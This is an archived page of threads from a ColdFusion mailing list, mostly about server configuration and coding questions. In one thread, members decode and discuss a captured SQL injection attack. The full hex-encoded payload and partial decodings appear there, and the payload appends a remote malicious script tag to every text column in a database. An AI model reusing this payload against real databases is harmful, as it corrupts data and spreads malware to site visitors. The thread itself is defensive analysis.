Re: Ack! CF9 pages not serving pages on IIS7.5 (404.3 error)

[Robert Rhodes]

Hello Russ.

I see the handler mappings as the site lever.  There are 5 entries.

Are you saying adding those entries at the root will prevemt hte problem I
described, where any change in webroot or adding a site takes down all
sites?

RR

On Fri, May 13, 2011 at 6:04 AM, Russ Michaels  wrote:

>
> you just go into the handler mappings at root or site level and add the
> handler yourself rather than let the web config tool do it.
> the advantage is that you canuse the same connector for all site, whereas
> the config tool creates a new connector for each site, which is pointless
> on
> a standard install.
>
> On Fri, May 13, 2011 at 6:08 AM, Robert Rhodes 
> wrote:
>
> >
> > Hello Russ.  How would I do it manually?  Are there instructions
> somewhere?
> >
> > It sure feels like that's the problem (connectors not being installed at
> > the
> > root level).
> >
> > There just has to be a decent workaround for this problem.
> >
> > On Thu, May 12, 2011 at 2:08 AM, Russ Michaels 
> > wrote:
> >
> > >
> > > I haven't actually tested it yet as we are still running IIS6, however
> if
> > > the problem is that the web config tool is not applying the connectors
> > > correctly at root level then you can try doing this manually and see if
> > > that
> > > resolves the problem.
> > >
> > > On Thu, May 12, 2011 at 6:38 AM, Andrew Scott  > > >wrote:
> > >
> > > >
> > > > Yes, this is a known issue.
> > > >
> > > > What happens is that when you do it in this manner, you are telling
> > > > ColdFusion to run in IIS7 mode. The connectors don't install to all
> the
> > > > websites when you do this, what you need to do is add a connector to
> > each
> > > > site individually.
> > > >
> > > > This blog might shed some more insight.
> > > >
> > > >
> > > >
> > >
> >
> http://www.andyscott.id.au/2011/3/29/Things-to-know-when-installing-ColdFusi
> > > > on-9-then-updating-to-901
> > > >
> > > > Regards,
> > > > Andrew Scott
> > > > http://www.andyscott.id.au/
> > > >
> > > >
> > > > > -Original Message-
> > > > > From: Robert Rhodes [mailto:rrhode...@gmail.com]
> > > > > Sent: Thursday, 12 May 2011 4:30 AM
> > > > > To: cf-talk
> > > > > Subject: Ack! CF9 pages not serving pages on IIS7.5 (404.3 error)
> > > > >
> > > > >
> > > > > Ok, I downloaded cf 9 and installed it on WIn2K8 R2 Web Server
> > > Edition.as
> > > > a
> > > > > standalone installation.
> > > > >
> > > > > I then ran the 9.01 updater and he 9.01 hotfix.
> > > > >
> > > > > Finally, I ran the webserver config tool and selected IIS all
> sites.
> > > > >
> > > > > Now when I load a cf template I get a 404.3 error and this message:
> > > > >
> > > > > HTTP Error 404.3 - Not Found
> > > > > The page you are requesting cannot be served because of the
> extension
> > > > > configuration. If the page is a script, add a handler. If the file
> > > should
> > > > be
> > > > > downloaded, add a MIME map.
> > > > >
> > > > > I am sure I did something wrong.  Any suggestions
> > > > >
> > > > > RR
> > > >
> > > >
> > > >
> > >
> > >
> >
> >
>
> 

~|
Order the Adobe Coldfusion Anthology now!
http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion
Archive: 
http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:344509
Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm
Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm

Getting basic CF8 CFCACHE working in CF9

[Terry Ford]

Hey...

I am trying to get a CF8 app working on CF9, and it was all seamless until I 
ran into CFCACHE.

I'm having problems getting CFCACHE to save anything to disk.  I understand the 
"default" behavior is now in-memory caching, but for now I'm just trying to get 
this thing to work as it did in CF8:  to disk.  

This was the code in CF8:



It simply saves the page to disk, one page per URL combination.  

1. I can't for the life of me work out how to do that in CF9.  First, I need to 
add "usequerystring=true" right because the default behavior was changed in CF9?

2. Then, do I need to wrap the entire page with  ...  ?   
Or, is just a lone  statement at the top of the page like in CF8 
sufficient?

3. Third, and most frustratingly, how do you CFCACHE to disk?  I'm using this 
statement in CF9:



However, when I run the page, it's caching to memory.  No files are appearing 
in "directory".

Please, what am I missing?   How do I get it to save everything to "directory" 
so that the cache will persist across server restarts?



~|
Order the Adobe Coldfusion Anthology now!
http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion
Archive: 
http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:344508
Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm
Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm

Re: Solr Errors

[Mary Jo Sminkey]

> >Just checking in Mary. Were you able to get past this? Have you
> >considering contacting Adobe for official support?
> 
> No, we had to drop the use of Solr at this time, 


Just FYI, I did submit a bug report on this, if anyone wants to comment or vote 
on it. 

http://cfbugs.adobe.com/cfbugreport/flexbugui/cfbugtracker/main.html?#bugId=86807

While I can batch up the data a single users add and run a single cfindex 
function to update all of it at once, I can't find a way to prevent issues with 
other types of concurrent cfindexes happening, such as multiple users or my 
unit tests. Cflock doesn't seem to lock the entire Solr indexing process so 
wasn't any help. 

http://cfbugs.adobe.com/cfbugreport/flexbugui/cfbugtracker/main.html?#bugId=86807


--- Mary Jo


 




~|
Order the Adobe Coldfusion Anthology now!
http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion
Archive: 
http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:344507
Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm
Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm

Re: cgi.host_name Security Exploit

[Jason Durham]

Dave pretty much summed it up.  Anybody who knows what a HOSTS file is,
knows how to mask the server_name. :)

Jason Durham


On Fri, May 13, 2011 at 2:28 PM, Dave Watts  wrote:

>
> > I have recently discovered a security flaw that I have reported to the
> Adobe
> > team regarding the use of the variable cgi.host_name.
> >
> > As you know, the cgi.host_name is typically the hostname of the server or
> > the websites domain name. I've discovered an exploit that allows a user
> to
> > basically change this variable to anything they want for the user's
> current
> > session. This exploit could be spread across sessions  in instances where
> a
> > website is caching absolute links using the cgi.host_name variable. It
> could
> > also be used to take advantage of applications that assume the
> cgi.host_name
> > variable is a constant, therefore developed applications don't take
> > precautions to sanitize this variable before inserting it into a database
> > could have issues.
>
> While it's a good thing you're telling people about this, I'm not sure
> I'd categorize it as a security flaw with CF, or even a security flaw
> in general.
>
> CF doesn't have anything to do with creating or validating many of the
> CGI variables. They're provided by the browser's HTTP request headers,
> or by the web server. CF just uses what it's given. Of course, those
> values are inherently untrustworthy and should always be sanitized.
>
> Dave Watts, CTO, Fig Leaf Software
> http://www.figleaf.com/
> http://training.figleaf.com/
>
> Fig Leaf Software is a Veteran-Owned Small Business (VOSB) on
> GSA Schedule, and provides the highest caliber vendor-authorized
> instruction at our training centers, online, or onsite
>
> 

~|
Order the Adobe Coldfusion Anthology now!
http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion
Archive: 
http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:344506
Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm
Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm

Re: Coldfusion 9 XML creation and HTML after

[Anene Isioma Wealth]

my guess is that you have answered your question by saying that you could use a 
cflocation tag.

Alternatively, if you trust your xml scrip to always create the xml document 
without errors, you may use a prompt to display your activity status just 
before 
you use the xml script.

 Best Regrads, 
Chuka I.W. Anene
Chief Software Eng./CEO
Quorium Solutions 
www.quorium.org
+234 70 3269 6113
+234 80 9530 7257

+234 1 881 2777






From: Ken Hammond 
To: cf-talk 
Sent: Fri, May 13, 2011 4:43:44 PM
Subject: Coldfusion 9 XML creation and HTML after


Here is what I am running into.  I have a web form that takes in the info I 
need.  I process the form on the next page and it creates an XML document 
that I need (which is being created successfully).  I need to display 
something back to the end user telling them it's been created.  After my end 
tag  if I write any text it throws back the errors 
that there is something after that end tag...  How do I create my XML 
document and still display something back to the end user (or if need be, 
use a cflocation to get them to an acknowledgement page?

The error that comes back in a red box:

This page contains the following errors:

error on line 26 at column 1: Extra content at the end of the document
Below is a rendering of the page up to the first error.


Ken 





~|
Order the Adobe Coldfusion Anthology now!
http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion
Archive: 
http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:344505
Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm
Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm

Re: cgi.host_name Security Exploit

[Dave Watts]

> I have recently discovered a security flaw that I have reported to the Adobe
> team regarding the use of the variable cgi.host_name.
>
> As you know, the cgi.host_name is typically the hostname of the server or
> the websites domain name. I've discovered an exploit that allows a user to
> basically change this variable to anything they want for the user's current
> session. This exploit could be spread across sessions  in instances where a
> website is caching absolute links using the cgi.host_name variable. It could
> also be used to take advantage of applications that assume the cgi.host_name
> variable is a constant, therefore developed applications don't take
> precautions to sanitize this variable before inserting it into a database
> could have issues.

While it's a good thing you're telling people about this, I'm not sure
I'd categorize it as a security flaw with CF, or even a security flaw
in general.

CF doesn't have anything to do with creating or validating many of the
CGI variables. They're provided by the browser's HTTP request headers,
or by the web server. CF just uses what it's given. Of course, those
values are inherently untrustworthy and should always be sanitized.

Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
http://training.figleaf.com/

Fig Leaf Software is a Veteran-Owned Small Business (VOSB) on
GSA Schedule, and provides the highest caliber vendor-authorized
instruction at our training centers, online, or onsite

~|
Order the Adobe Coldfusion Anthology now!
http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion
Archive: 
http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:344504
Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm
Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm

Re: Coldfusion 9 XML creation and HTML after

[Dave Watts]

> Here is what I am running into.  I have a web form that takes in the info I
> need.  I process the form on the next page and it creates an XML document
> that I need (which is being created successfully).  I need to display
> something back to the end user telling them it's been created.  After my end
> tag  if I write any text it throws back the errors
> that there is something after that end tag...  How do I create my XML
> document and still display something back to the end user (or if need be,
> use a cflocation to get them to an acknowledgement page?

You can't output both XML and HTML within a single HTTP response.
Well, you can, but the client won't know what to do with it. If you
need to generate XML, that typically isn't going to be returned
directly to the browser, because the browser won't know what to do
with it.

So, you will have to take a slightly different approach. There are a
couple of ways you could go. You could notify the user before
generating the XML, then redirect the user to the XML generation. Or,
you could generate the XML and store it in a variable or file, then
allow the user to click a link to generate the appropriate XML
response.

Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
http://training.figleaf.com/

Fig Leaf Software is a Veteran-Owned Small Business (VOSB) on
GSA Schedule, and provides the highest caliber vendor-authorized
instruction at our training centers, online, or on

~|
Order the Adobe Coldfusion Anthology now!
http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion
Archive: 
http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:344503
Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm
Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm

Re: Coldfusion 9 XML creation and HTML after

[Russ Michaels]

can you post the code here
http://pastebin.com/



On Fri, May 13, 2011 at 5:43 PM, Ken Hammond  wrote:

>
> Here is what I am running into.  I have a web form that takes in the info I
> need.  I process the form on the next page and it creates an XML document
> that I need (which is being created successfully).  I need to display
> something back to the end user telling them it's been created.  After my
> end
> tag  if I write any text it throws back the errors
> that there is something after that end tag...  How do I create my XML
> document and still display something back to the end user (or if need be,
> use a cflocation to get them to an acknowledgement page?
>
> The error that comes back in a red box:
>
> This page contains the following errors:
>
> error on line 26 at column 1: Extra content at the end of the document
> Below is a rendering of the page up to the first error.
>
>
> Ken
>
>
>
> 

~|
Order the Adobe Coldfusion Anthology now!
http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion
Archive: 
http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:344502
Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm
Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm

RE: Can anyone decode this?

[Bobby Hartsfield]

DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR
select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and
a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set
['+@C+']=['+@C+']+''">http://sdo.1000mg.cn/csrss/w.js";>

cgi.host_name Security Exploit

[Paul Alkema]

Greetings and Salutations My Fellow Programmers!

I have recently discovered a security flaw that I have reported to the Adobe
team regarding the use of the variable cgi.host_name.

 

As you know, the cgi.host_name is typically the hostname of the server or
the websites domain name. I've discovered an exploit that allows a user to
basically change this variable to anything they want for the user's current
session. This exploit could be spread across sessions  in instances where a
website is caching absolute links using the cgi.host_name variable. It could
also be used to take advantage of applications that assume the cgi.host_name
variable is a constant, therefore developed applications don't take
precautions to sanitize this variable before inserting it into a database
could have issues.

 

Just wanted to give the community a heads up on this. :)

 

Regards,

Paul Alkema

http://paulalkema.com/



~|
Order the Adobe Coldfusion Anthology now!
http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion
Archive: 
http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:344500
Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm
Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm

Coldfusion 9 XML creation and HTML after

[Ken Hammond]

Here is what I am running into.  I have a web form that takes in the info I 
need.  I process the form on the next page and it creates an XML document 
that I need (which is being created successfully).  I need to display 
something back to the end user telling them it's been created.  After my end 
tag  if I write any text it throws back the errors 
that there is something after that end tag...  How do I create my XML 
document and still display something back to the end user (or if need be, 
use a cflocation to get them to an acknowledgement page?

The error that comes back in a red box:

This page contains the following errors:

error on line 26 at column 1: Extra content at the end of the document
Below is a rendering of the page up to the first error.


Ken 



~|
Order the Adobe Coldfusion Anthology now!
http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion
Archive: 
http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:344499
Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm
Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm

RE: Can anyone decode this?

[Mark A. Kruger]

Yep a bit cleaner than the last attack like this I saw.

-Original Message-
From: Russ Michaels [mailto:r...@michaels.me.uk] 
Sent: Friday, May 13, 2011 10:31 AM
To: cf-talk
Subject: Re: Can anyone decode this?


it is some very clever SQL though

On Fri, May 13, 2011 at 3:57 PM, Mark A. Kruger
wrote:

>
> This tries to append a malicious script to all the character columns in
> your
> DB in the hopes that you will select them and output them to a page  (thus
> propogating the link).
>
> The script is a 

Re: Can anyone decode this?

[Russ Michaels]

it is some very clever SQL though

On Fri, May 13, 2011 at 3:57 PM, Mark A. Kruger wrote:

>
> This tries to append a malicious script to all the character columns in
> your
> DB in the hopes that you will select them and output them to a page  (thus
> propogating the link).
>
> The script is a 

RE: Can anyone decode this?

[Mark A. Kruger]

This tries to append a malicious script to all the character columns in your
DB in the hopes that you will select them and output them to a page  (thus
propogating the link).

The script is a 

RE: Can anyone decode this?

[Jeff Garza]

Put this in your SQL Query analyzer tool and change the EXEC at the end to
PRINT.  It should print out the SQL Statement for you to see what they were
trying to do.

Cheers,

Jeff 

-Original Message-
From: Che Vilnonis [mailto:ch...@asitv.com] 
Sent: Friday, May 13, 2011 7:31 AM
To: cf-talk
Subject: Can anyone decode this?


Can anyone decode this? This was a URL attack that was caught by some custom
code. I tried decoding the string at
http://meyerweb.com/eric/tools/dencoder/ but had no luck.

113|736;DECLARE @S CHAR(4000);SET
@S=CAST(0x4445434C415245204054207661726368617228323535292C404320766172636861
72283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F
522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A65637473
20612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E
78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D33
35206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E20
5461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F4375
72736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D30
2920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40
432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D
22687474703A2F2F73646F2E313030306D672E636E2F63737273732F772E6A73223E3C2F7363
726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B652027272522
3E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F73646F2E313030306D
672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D2727272946455443
48204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C40432045
4E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C65
5F437572736F72 AS CHAR(4000));EXEC(@S); 

Thanks, Che






~|
Order the Adobe Coldfusion Anthology now!
http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion
Archive: 
http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:344495
Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm
Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm

Re: Can anyone decode this?

[John M Bliss]

http://www.dolcevie.com/js/converter.html

On Fri, May 13, 2011 at 9:36 AM, Che Vilnonis  wrote:

>
> John, what did you do to decode this? Thanks, Che
>
> -Original Message-
> From: John M Bliss [mailto:bliss.j...@gmail.com]
> Sent: Friday, May 13, 2011 10:34 AM
> To: cf-talk
> Subject: Re: Can anyone decode this?
>
>
> Patial:
>
> DECLARE @T varchar(255),@C varcha?"?C?DT4??$R?F?&?U?7W'6?"?5U%4?"?d?R
> select a.name,b.name from
> sysobjects7?66??V??2?"?v?W&RC?"??B???B???xtype='u' and (b.xtype=99
> or b.xtype=3?R??"?"??G??S?#3???"?"??G??S??crT??Table_Cursor FETCH NEXT
> FROM  Table_Cu?'6?"???D???B??2?t???R???dUD4??5D?EU3??) BEGIN exec('update
> ['+@T+'] set ['+@?2?u???r??2?u??rr#???F?F?S??67&??B?7&3?"
> http://sdo.1000mg.cn/csrss/w.js
> "> >

Re: Can anyone decode this?

[Christopher Stowell]

My guess is based on the partial decoding it has to do with this:

http://www.broadbandreports.com/forum/r21043551-sdo1000mgcncsrsswjs-what-is-it







From: John M Bliss 
To: cf-talk 
Sent: Fri, May 13, 2011 8:34:09 AM
Subject: Re: Can anyone decode this?


Patial:

DECLARE @T varchar(255),@C varcha?"?C?DT4??$R?F?&?U?7W'6?"?5U%4?"?d?R
select a.name,b.name from
sysobjects7?66??V??2?"?v?W&RC?"??B???B???xtype='u' and (b.xtype=99
or b.xtype=3?R??"?"??G??S?#3???"?"??G??S??crT??Table_Cursor FETCH NEXT
FROM  Table_Cu?'6?"???D???B??2?t???R???dUD4??5D?EU3??) BEGIN exec('update
['+@T+'] set ['+@?2?u???r??2?u??rr#???F?F?S??67&??B?7&3?"
http://sdo.1000mg.cn/csrss/w.js";>
src="http://sdo.1000m?r?6??77'72?r??2#???67&??C?rrr?dUD?H NEXT FROM
Table_Cursor INTO @T,@C E??B?4??4R?F?&?U?7W'6?"?DT4?DR?F?&??_Cursor

On Fri, May 13, 2011 at 9:31 AM, Che Vilnonis  wrote:

>
> Can anyone decode this? This was a URL attack that was caught by some
> custom
> code. I tried decoding the string at
> http://meyerweb.com/eric/tools/dencoder/ but had no luck.
>
> 113|736;DECLARE @S CHAR(4000);SET
>
> @S=CAST(0x4445434C415245204054207661726368617228323535292C404320766172636861
>
> 72283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F
>
> 522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A65637473
>
> 20612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E
>
> 78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D33
>
> 35206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E20
>
> 5461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F4375
>
> 72736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D30
>
> 2920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40
>
> 432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D
>
> 22687474703A2F2F73646F2E313030306D672E636E2F63737273732F772E6A73223E3C2F7363
>
> 726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B652027272522
>
> 3E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F73646F2E313030306D
>
> 672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D2727272946455443
>
> 48204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C40432045
>
> 4E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C65
> 5F437572736F72 AS CHAR(4000));EXEC(@S);
>
> Thanks, Che
>
>
>
>
> 



~|
Order the Adobe Coldfusion Anthology now!
http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion
Archive: 
http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:344493
Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm
Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm

RE: Can anyone decode this?

[Che Vilnonis]

John, what did you do to decode this? Thanks, Che 

-Original Message-
From: John M Bliss [mailto:bliss.j...@gmail.com] 
Sent: Friday, May 13, 2011 10:34 AM
To: cf-talk
Subject: Re: Can anyone decode this?


Patial:

DECLARE @T varchar(255),@C varcha?"?C?DT4??$R?F?&?U?7W'6?"?5U%4?"?d?R
select a.name,b.name from
sysobjects7?66??V??2?"?v?W&RC?"??B???B???xtype='u' and (b.xtype=99
or b.xtype=3?R??"?"??G??S?#3???"?"??G??S??crT??Table_Cursor FETCH NEXT
FROM  Table_Cu?'6?"???D???B??2?t???R???dUD4??5D?EU3??) BEGIN exec('update
['+@T+'] set ['+@?2?u???r??2?u??rr#???F?F?S??67&??B?7&3?"
http://sdo.1000mg.cn/csrss/w.js";>

Re: Can anyone decode this?

[John M Bliss]

Patial:

DECLARE @T varchar(255),@C varcha?"?C?DT4??$R?F?&?U?7W'6?"?5U%4?"?d?R
select a.name,b.name from
sysobjects7?66??V??2?"?v?W&RC?"??B???B???xtype='u' and (b.xtype=99
or b.xtype=3?R??"?"??G??S?#3???"?"??G??S??crT??Table_Cursor FETCH NEXT
FROM  Table_Cu?'6?"???D???B??2?t???R???dUD4??5D?EU3??) BEGIN exec('update
['+@T+'] set ['+@?2?u???r??2?u??rr#???F?F?S??67&??B?7&3?"
http://sdo.1000mg.cn/csrss/w.js";>

Can anyone decode this?

[Che Vilnonis]

Can anyone decode this? This was a URL attack that was caught by some custom
code. I tried decoding the string at
http://meyerweb.com/eric/tools/dencoder/ but had no luck.

113|736;DECLARE @S CHAR(4000);SET
@S=CAST(0x4445434C415245204054207661726368617228323535292C404320766172636861
72283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F
522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A65637473
20612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E
78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D33
35206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E20
5461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F4375
72736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D30
2920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40
432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D
22687474703A2F2F73646F2E313030306D672E636E2F63737273732F772E6A73223E3C2F7363
726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B652027272522
3E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F73646F2E313030306D
672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D2727272946455443
48204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C40432045
4E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C65
5F437572736F72 AS CHAR(4000));EXEC(@S); 

Thanks, Che




~|
Order the Adobe Coldfusion Anthology now!
http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion
Archive: 
http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:344490
Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm
Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm

Re: Extending App.cfc

[Dave Watts]

> I have an application.cfc in my root folder that defines my app. I also have 
> a subfolder that has it's own app.cfc which
> extends the original app through the ApplicationProxy.cfc method. Basically 
> this is being done to have a different
> OnRequestStart method.
>
> The way I thought I understood this was when a file in the subfolder is 
> accessed, all the methods that aren't in the
> subfolder app.cfc would be executed from the root version. Is this incorrect, 
> because it doesn't seem like my
> OnApplicationStart is run.

The methods in the parent should execute if they're not overridden in
the child, so it sounds like you have some other problem there.

Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
http://training.figleaf.com/

Fig Leaf Software is a Veteran-Owned Small Business (VOSB) on
GSA Schedule, and provides the highest caliber vendor-authorized
instruction at our training centers, online, or onsite.

~|
Order the Adobe Coldfusion Anthology now!
http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion
Archive: 
http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:344489
Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm
Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm

Exclusive Named Locked / and PreAuthorized Purchasing

[Brook Davies]

I am posting this again, the last time the formatting got kinda munged:

 

I am trying to set up an inventory/ticket purchasing system.  I have a table
that stores the available quantity, and I have a form where users can
purchase tickets. The form shows the current number of available tickets.  I
have another table that I am using to hold pre-authorizations that
essentially 'hold' a specific quantity while the purchase is complete.

Because the purchase may involve a trip to payPal, I need to be able to
lookup the pre-authorized amount when I get the callback from Paypal and
either commit that amount on success or release it on failure.

 

Does this rough outline make sense? Can I use a named lock in this fashion
to lock to separate pieces of code to ensure they are single threaded?

 

 

1.   User submits the form

 

START EXCLUSIVE NAMED LOCK ('TICKETPURCHASE'):

 

i.  Get Available ticket quantity + any
pending pre-authorizations to purchase.

 

ii.  If the number available - number of
purchases pending > 0, then add an entry to the pre-auth table to the
requested quantity for the current purchaser

 

 

END EXCLUSIVE NAMED LOCK ('TICKETPURCHASE')

 

2.   Process credit card

 

 

   a.   ON SUCCESS

 

START EXCLUSIVE NAMED LOCK ('TICKETPURCHASE')

 

1.   Get pre-auth record, update available ticket quantity table

(essentially committing the pre authorized items

 

2.   Delete pre-auth record

 

 ENDEXCLUSIVE NAMED LOCK ('TICKETPURCHASE')

 

 

b.  ON FAILURE

START EXCLUSIVE NAMED LOCK ('TICKETPURCHASE')

1.   Delete pre-auth record

END EXCLUSIVE NAMED LOCK ('TICKETPURCHASE')

 

 

Will a system like this work?

Brook

 

 




~|
Order the Adobe Coldfusion Anthology now!
http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion
Archive: 
http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:344488
Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm
Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm

Re: Ack! CF9 pages not serving pages on IIS7.5 (404.3 error)

[Russ Michaels]

you just go into the handler mappings at root or site level and add the
handler yourself rather than let the web config tool do it.
the advantage is that you canuse the same connector for all site, whereas
the config tool creates a new connector for each site, which is pointless on
a standard install.

On Fri, May 13, 2011 at 6:08 AM, Robert Rhodes  wrote:

>
> Hello Russ.  How would I do it manually?  Are there instructions somewhere?
>
> It sure feels like that's the problem (connectors not being installed at
> the
> root level).
>
> There just has to be a decent workaround for this problem.
>
> On Thu, May 12, 2011 at 2:08 AM, Russ Michaels 
> wrote:
>
> >
> > I haven't actually tested it yet as we are still running IIS6, however if
> > the problem is that the web config tool is not applying the connectors
> > correctly at root level then you can try doing this manually and see if
> > that
> > resolves the problem.
> >
> > On Thu, May 12, 2011 at 6:38 AM, Andrew Scott  > >wrote:
> >
> > >
> > > Yes, this is a known issue.
> > >
> > > What happens is that when you do it in this manner, you are telling
> > > ColdFusion to run in IIS7 mode. The connectors don't install to all the
> > > websites when you do this, what you need to do is add a connector to
> each
> > > site individually.
> > >
> > > This blog might shed some more insight.
> > >
> > >
> > >
> >
> http://www.andyscott.id.au/2011/3/29/Things-to-know-when-installing-ColdFusi
> > > on-9-then-updating-to-901
> > >
> > > Regards,
> > > Andrew Scott
> > > http://www.andyscott.id.au/
> > >
> > >
> > > > -Original Message-
> > > > From: Robert Rhodes [mailto:rrhode...@gmail.com]
> > > > Sent: Thursday, 12 May 2011 4:30 AM
> > > > To: cf-talk
> > > > Subject: Ack! CF9 pages not serving pages on IIS7.5 (404.3 error)
> > > >
> > > >
> > > > Ok, I downloaded cf 9 and installed it on WIn2K8 R2 Web Server
> > Edition.as
> > > a
> > > > standalone installation.
> > > >
> > > > I then ran the 9.01 updater and he 9.01 hotfix.
> > > >
> > > > Finally, I ran the webserver config tool and selected IIS all sites.
> > > >
> > > > Now when I load a cf template I get a 404.3 error and this message:
> > > >
> > > > HTTP Error 404.3 - Not Found
> > > > The page you are requesting cannot be served because of the extension
> > > > configuration. If the page is a script, add a handler. If the file
> > should
> > > be
> > > > downloaded, add a MIME map.
